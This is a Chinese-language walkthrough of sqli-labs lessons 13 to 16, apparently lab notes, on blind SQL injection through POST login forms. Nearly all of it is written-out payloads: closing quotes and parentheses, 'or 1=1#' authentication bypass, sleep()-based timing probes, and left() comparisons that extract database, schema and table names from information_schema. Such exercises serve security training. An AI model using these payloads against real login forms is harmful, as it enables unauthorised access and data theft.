less13-less16为布尔型盲注，没有回显数据。

less-13——基于’)的错误布尔注入

 以下均为POST内容：

1、uname=admin &passwd=admin&submit=Submit 此时只是显示登陆成功，但是不会显示其他的信息。
2、uname=‘ &passwd=a&submit=Submit 直接通过报错信息知道了如何构造 构造：1’) or 1=1#

uname=a') or 1=1#  &passwd=admin &submit=Submit

3、uname=admin‘) order by 2# &passwd=admin&submit=Submit 此时只是显示登陆成功，但是不会显示其他信息，考虑盲注。

uname=admin') order by 2#  &passwd=admin &submit=Submit

4、uname=admin‘) or if(length(database())=8,1,sleep(5))# &passwd=admin&submit=Submit 此时可以得到数据库的长度是8.

uname=admin') or if(length(database())=8,1,sleep(2))#  &passwd=admin &submit=Submit

5、uname=admin&passwd=ain‘) or left(database(),1)>’a‘#&submit=Submit 使用or和left()来判断第一个字母是多少(注意的是这里不是使用and)

uname=admin') and left(database(),1)>'a'#  &passwd=admin &submit=Submit

6、uname=admin&passwd=ain‘) or left(database(),2)=’se‘#&submit=Submit 通过这样一个个进行判断即可！

uname=admin') and left(database(),2)>'sa'#  &passwd=admin &submit=Submit

7、uname=admin&passwd=ain‘) or left((select schema_name from information_schema.schemata limit 0,1),1)>’a‘#&submit=Submit 或者是使用这种方法也是可以判断的。
uname=admin&passwd=ain‘) or left((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1)=’e‘#&submit=Submit 查表，也可使用burpsuite进行辅助测试

uname=admin') and left((select schema_name from information_schema.schemata limit 0,1),1)>"a"#  &passwd=admin &submit=Submit

less-14——基于"的错误布尔注入

less14同less13，闭合符合为双引号闭合。

uname=admin" and 1=1# &passwd=admin &submit=Submit

less15——基于'的注入

less15同less13，闭合符合为单引号闭合。

uname=admin' and 1=1# &passwd=admin &submit=Submit

less16——基于")的注入

less16同less13，闭合符号为双引号右括号闭合。

uname=admin") and 1=1# &passwd=admin &submit=Submit